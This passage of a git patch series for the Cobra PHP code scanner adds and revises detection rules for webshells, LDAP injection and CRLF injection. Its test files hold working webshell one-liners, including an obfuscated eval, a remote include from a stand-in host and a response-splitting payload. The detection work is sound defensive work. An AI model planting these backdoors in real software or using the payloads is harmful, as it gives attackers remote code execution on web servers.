+<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell31"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\)]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml index 4b4ecbd0..5a32e9df 100644 --- a/rules/CVI-360032.xml +++ b/rules/CVI-360032.xml @@ -1,13 +1,9 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell12"/> + <name value="webshell"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C" - ]]> + Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C"]]> - - ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index bb815d31..9f77cf83 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml @@ -1,13 +1,9 @@ - + - |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD - ]]></match> + <match mode="regex-only-match"><![CDATA[PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\?duzkaydet=|phpRemoteView</a>|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|<h3>PHPKonsole</h3>|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|<h1>Linux Shells</h1>|\$MyShellVersion\s*=\s*\"MyShell|<a\s*href=\"http://ihacklog.com/\"|setcookie\(\s*\"mysql_web_admin_username\"\s*\)|<title>PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php index 45693505..c0466aeb 100644 --- a/tests/vulnerabilities/webshell.php +++ b/tests/vulnerabilities/webshell.php @@ -1,41 +1,66 @@ -<?php -//cvi-360001 -eval($_POST['C']); - //cvi-360002 -$a="ss"; -include("sss.jpg"); +include "sss.jpg"; +include("sss_tmp"); +require_once "http://www.test.com/sss.php"; -//cvi-360003 -echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a) +//扫不出来.... +$a="http://www.test.com/sss.php"; +require_once $a; -//cvi-360004 -$string = 'AABBCCDDEE'; -preg_replace($_POST['A'], $_POST['B'], $string); +//cvi-360016 +filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); +//cvi-360017 换行挂 +$op=array('options' => 'assert'); +filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); -//cvi-360005 ????? -$a = $_POST['A']; preg_replace($a, $_POST['B'], $string); +//cvi-360018 一句话 +mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); +//cvi-360019 换行挂 +$e = "\ise"; +$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); -//cvi-360006 换行就挂 -$b = $_POST['B']; preg_replace($_POST['A'], $b, $string); +//cvi-360022 +ini_set('allow_url_include, 1'); // Allow url inclusion in this script +include('php://input'); -//cvi-360007 -array_map("ass\x65rt",(array)$_REQUEST['expdoor']); +//cvi-360023 特征值 +GIF87a<?php +BM<?php -//cvi-360008 +//cvi-360026 +$cb= 'system'; +ob_start($cb); +echo $_GET[c]; +ob_end_flush(); -//cvi-360009 -$e = $_REQUEST['e']; -$arr = array($_POST['pass'],); -array_filter($arr, base64_decode($e)); +$evalstr=""; +ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); +echo $_REQUEST['pass']; +ob_end_flush(); +assert($evalstr); -//cvi-360010 换行就挂 -$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); +ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); +echo $_REQUEST['pass']; +ob_end_flush(); -//cvi-360011 换行就挂 -$newfunc = create_function(null,'assert($_POST[c]);');$newfunc(); +//cvi-360028 一句话 +eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); +eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); -//cvi-360012 换行就挂 -$newfunc = create_function('str','return str');$newfunc("$_POST['c']"); -?> +//cvi-360034 一句话 +$_POST['sa']($_POST['sb']); +$_POST['sa']($_POST['sb'],$_POST['sc']); + +$sa = $_POST['sa']; +$sa($_POST['sb']); + +$sa = $_POST['sa']; +$sb = $_POST['sb']; +$sa($sb); + +$sa = $_POST['sa']; +$_POST($sa ); + + +?> From 554cd4c14a3f7fe0c0f008ac57d24e12855798b1 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Wed, 6 Sep 2017 11:22:46 +0800 Subject: [PATCH 15/29] delete HRS + add LADP Injection --- rules/{CVI-250001.xml => CVI-165001.xml} | 10 ++++++-- rules/CVI-220001.xml | 32 ------------------------ 2 files changed, 8 insertions(+), 34 deletions(-) rename rules/{CVI-250001.xml => CVI-165001.xml} (62%) delete mode 100644 rules/CVI-220001.xml diff --git a/rules/CVI-250001.xml b/rules/CVI-165001.xml similarity index 62% rename from rules/CVI-250001.xml rename to rules/CVI-165001.xml index 73530215..6b8b4512 100644 --- a/rules/CVI-250001.xml +++ b/rules/CVI-165001.xml @@ -2,10 +2,16 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="LDAP注入"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[ldap_(add|delete|list|read|search|bind)]]></match> + <match mode="function-param-controllable"><![CDATA[(ldap_add|ldap_delete|ldap_list|ldap_read|ldap_search|ldap_bind)]]></match> <repair block="in-function-up"><![CDATA[ldap_escape\s*\(\s*.+?\s*,\s*.+?\s*,\s*LDAP_ESCAPE_FILTER\s*\)]]></repair> <level value="5"/> <test> + <case assert="true"><![CDATA[ + $surname=$_GET['surname']; + $filter = "(sn=" . $surname . ")"; + $sr=ldap_search($ds, "o=My Company, c=US", $filter); + $info = ldap_get_entries($ds, $sr); + ]]></case> </test> <solution> ## 安全风险 @@ -15,7 +21,7 @@ 这种威胁可以让攻击者能够从LADP树中提取到很多很重要的信息 ## 修复方案 - 对用户输入数据中包含的”语言本身的保留字符”进行转义 + 对用户输入数据中包含的”语言本身的保留字符”进行转义(例如可以使用`ldap_escape`) </solution> <status value="on"/> diff --git a/rules/CVI-220001.xml b/rules/CVI-220001.xml deleted file mode 100644 index 863f50c5..00000000 --- a/rules/CVI-220001.xml +++ /dev/null @@ -1,32 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="HRS(CRLF)"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[header\s*\(\s*[^;]*\$_(GET|POST|REQUEST|SERVER|COOKIE)]]></match> - <level value="5"/> - <test> - <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> - </test> - <solution> - ## 安全风险 - CRLF是"回车+换行"(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器根据这两个CRLF来取出HTTP内容并显示出来。 - 所以,一旦能够控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting. - CRLF Injection (CRLF注入) / HTTP Response Splitting(HRS) - - ## 修复方案 - 使用白名单判断 - - ## 代码示例 - - `<?php header("Location: ".$_GET["url"]); ?>` 构造 - `/index.php?url=a%0a%0dContent-Type:%20text/html%0a%0d%0a%0d<script>alert(1)</script>`发生注入 - - 修复方法:设置白名单,限制输入的URL - ```php - <?php if(!in_array($_GET["url"], $whitelist)) exit; ?> - ``` - </solution> - - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file From adb2ed7b15982b0687494ad6024f60cdc73151a3 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Wed, 6 Sep 2017 11:38:23 +0800 Subject: [PATCH 16/29] improve rules --- rules/CVI-360022.xml | 22 ++++++++++++++++++ rules/CVI-360023.xml | 16 +++++++++++++ rules/CVI-360026.xml | 36 ++++++++++++++++++++++++++++++ rules/CVI-360034.xml | 33 +++++++++++++++++++++++++++ tests/vulnerabilities/webshell.php | 35 +++++------------------------ 5 files changed, 113 insertions(+), 29 deletions(-) create mode 100644 rules/CVI-360022.xml create mode 100644 rules/CVI-360023.xml create mode 100644 rules/CVI-360026.xml create mode 100644 rules/CVI-360034.xml diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml new file mode 100644 index 00000000..7e110ed8 --- /dev/null +++ b/rules/CVI-360022.xml @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell22"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + ini_set('allow_url_include, 1'); + include('php://input'); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml new file mode 100644 index 00000000..ee83be9c --- /dev/null +++ b/rules/CVI-360023.xml @@ -0,0 +1,16 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell23"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml new file mode 100644 index 00000000..e8d8ef15 --- /dev/null +++ b/rules/CVI-360026.xml @@ -0,0 +1,36 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell26"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\))]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $cb= 'system'; + ob_start($cb); + echo $_GET[c]; + ob_end_flush(); + ]]></case> + <case assert="true"><![CDATA[ + $evalstr=""; + ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); + echo $_REQUEST['pass']; + ob_end_flush(); + assert($evalstr); + ]]></case> + <case assert="true"><![CDATA[ + ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); + echo $_REQUEST['pass']; + ob_end_flush(); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360034.xml b/rules/CVI-360034.xml new file mode 100644 index 00000000..ef937b79 --- /dev/null +++ b/rules/CVI-360034.xml @@ -0,0 +1,33 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell34"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$_POST['sa']($_POST['sb']);]]></case> + <case assert="true"><![CDATA[$_POST['sa']($_POST['sb'],$_POST['sc']);]]></case> + <case assert="true"><![CDATA[ + $sa = $_POST['sa']; + $sa($_POST['sb']); + ]]></case> + <case assert="true"><![CDATA[ + $sa = $_POST['sa']; + $sb = $_POST['sb']; + $sa($sb); + ]]></case> + <case assert="true"><![CDATA[ + $sa = $_POST['sa']; + $_POST($sa ); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php index c0466aeb..5da752fa 100644 --- a/tests/vulnerabilities/webshell.php +++ b/tests/vulnerabilities/webshell.php @@ -9,13 +9,13 @@ //cvi-360016 filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); -//cvi-360017 换行挂 +//cvi-360017 $op=array('options' => 'assert'); filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); -//cvi-360018 一句话 +//cvi-360018 mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); -//cvi-360019 换行挂 +//cvi-360019 $e = "\ise"; $data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); @@ -23,7 +23,7 @@ ini_set('allow_url_include, 1'); // Allow url inclusion in this script include('php://input'); -//cvi-360023 特征值 +//cvi-360023 GIF87a<?php BM<?php @@ -33,34 +33,11 @@ echo $_GET[c]; ob_end_flush(); -$evalstr=""; -ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); -echo $_REQUEST['pass']; -ob_end_flush(); -assert($evalstr); - -ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); -echo $_REQUEST['pass']; -ob_end_flush(); - -//cvi-360028 一句话 +//cvi-360028 eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); -//cvi-360034 一句话 +//cvi-360034 $_POST['sa']($_POST['sb']); -$_POST['sa']($_POST['sb'],$_POST['sc']); - -$sa = $_POST['sa']; -$sa($_POST['sb']); - -$sa = $_POST['sa']; -$sb = $_POST['sb']; -$sa($sb); - -$sa = $_POST['sa']; -$_POST($sa ); - - ?> From a69e30381c6c5842b46bae9f77bb22f30adfbf10 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Wed, 6 Sep 2017 12:02:53 +0800 Subject: [PATCH 17/29] =?UTF-8?q?=E5=A2=9E=E5=8A=A0webshell=E6=89=AB?= =?UTF-8?q?=E6=8F=8F=E8=A7=84=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-140001.xml | 1 - rules/CVI-140002.xml | 3 +- rules/CVI-360001.xml | 21 ----- rules/CVI-360002.xml | 9 +- rules/CVI-360003.xml | 21 ----- rules/CVI-360007.xml | 11 ++- rules/CVI-360010.xml | 2 +- rules/CVI-360014.xml | 4 +- rules/CVI-360015.xml | 4 +- rules/CVI-360016.xml | 7 +- rules/CVI-360017.xml | 9 +- rules/CVI-360018.xml | 6 +- rules/CVI-360019.xml | 9 +- rules/CVI-360022.xml | 9 +- rules/CVI-360023.xml | 7 +- rules/CVI-360024.xml | 4 +- rules/CVI-360025.xml | 4 +- rules/CVI-360026.xml | 23 ++++- rules/CVI-360027.xml | 4 +- rules/CVI-360028.xml | 6 +- rules/CVI-360029.xml | 6 +- rules/CVI-360030.xml | 6 +- rules/CVI-360031.xml | 6 +- rules/CVI-360032.xml | 8 +- rules/CVI-360033.xml | 8 +- rules/CVI-360034.xml | 19 +++- rules/CVI-360035.xml | 21 ----- rules/CVI-360036.xml | 21 ----- rules/CVI-360037.xml | 21 ----- rules/CVI-360038.xml | 21 ----- rules/CVI-360039.xml | 21 ----- rules/CVI-360040.xml | 21 ----- rules/CVI-360041.xml | 21 ----- rules/CVI-360042.xml | 21 ----- rules/CVI-360043.xml | 21 ----- rules/CVI-360044.xml | 21 ----- rules/CVI-360045.xml | 21 ----- rules/CVI-360046.xml | 21 ----- rules/CVI-360047.xml | 21 ----- rules/CVI-360048.xml | 21 ----- rules/CVI-360049.xml | 21 ----- rules/CVI-360050.xml | 21 ----- rules/CVI-360051.xml | 21 ----- rules/CVI-360052.xml | 21 ----- tests/vulnerabilities/v.php | 6 +- tests/vulnerabilities/webshell.php | 136 +++++++++++++++++------------ 46 files changed, 170 insertions(+), 567 deletions(-) delete mode 100644 rules/CVI-360001.xml delete mode 100644 rules/CVI-360003.xml delete mode 100644 rules/CVI-360035.xml delete mode 100644 rules/CVI-360036.xml delete mode 100644 rules/CVI-360037.xml delete mode 100644 rules/CVI-360038.xml delete mode 100644 rules/CVI-360039.xml delete mode 100644 rules/CVI-360040.xml delete mode 100644 rules/CVI-360041.xml delete mode 100644 rules/CVI-360042.xml delete mode 100644 rules/CVI-360043.xml delete mode 100644 rules/CVI-360044.xml delete mode 100644 rules/CVI-360045.xml delete mode 100644 rules/CVI-360046.xml delete mode 100644 rules/CVI-360047.xml delete mode 100644 rules/CVI-360048.xml delete mode 100644 rules/CVI-360049.xml delete mode 100644 rules/CVI-360050.xml delete mode 100644 rules/CVI-360051.xml delete mode 100644 rules/CVI-360052.xml diff --git a/rules/CVI-140001.xml b/rules/CVI-140001.xml index 6b76a9bb..31d244ca 100644 --- a/rules/CVI-140001.xml +++ b/rules/CVI-140001.xml @@ -1,5 +1,4 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> <name value="文本框反射型XSS"/> <language value="jsp"/> diff --git a/rules/CVI-140002.xml b/rules/CVI-140002.xml index 6be5dbfd..852d0d45 100644 --- a/rules/CVI-140002.xml +++ b/rules/CVI-140002.xml @@ -1,7 +1,6 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> - <name value="输出入参"/> + <name value="输出入参可能导致XSS"/> <language value="java"/> <match mode="regex-only-match"><![CDATA[out\.println\s*\(\s*request\.get(Parameter|QueryString)\s*\(\s*\"]]></match> <level value="4"/> diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml deleted file mode 100644 index 0fb57ad6..00000000 --- a/rules/CVI-360001.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell1"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[eval($_POST['C']);]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml index 430020dd..557afde8 100644 --- a/rules/CVI-360002.xml +++ b/rules/CVI-360002.xml @@ -3,14 +3,13 @@ <name value="webshell2"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ + \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{0,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ ]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[ - $a="ss"; - include("sss.jpg"); - ]]></case> + <case assert="true"><![CDATA[include "sss.jpg";]]></case> + <case assert="true"><![CDATA[include("sss_tmp");]]></case> + <case assert="true"><![CDATA[require_once "http://www.test.com/sss.php";]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml deleted file mode 100644 index 584f833b..00000000 --- a/rules/CVI-360003.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell3"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a)]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml index 6dcdd6e4..b107d531 100644 --- a/rules/CVI-360007.xml +++ b/rules/CVI-360007.xml @@ -1,17 +1,22 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell7"/> + <name value="PHP反射后门"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - (array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) + (new\s*ReflectionFunction|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) ]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[array_map("ass\x65rt",(array)$_REQUEST['expdoor']);]]></case> + <case assert="true"><![CDATA[ + $func = new ReflectionFunction($_GET[m]); + echo $func->invokeArgs(array($_GET[c],$_GET[id])); + ]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + [webshell样例 链接](https://github.com/tennc/webshell/blob/master/php/p2j/PHP%20reflection.php.txt) ## 修复方案 删除 diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml index 6bbfb48a..2a5e05cb 100644 --- a/rules/CVI-360010.xml +++ b/rules/CVI-360010.xml @@ -3,7 +3,7 @@ <name value="webshell10"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - 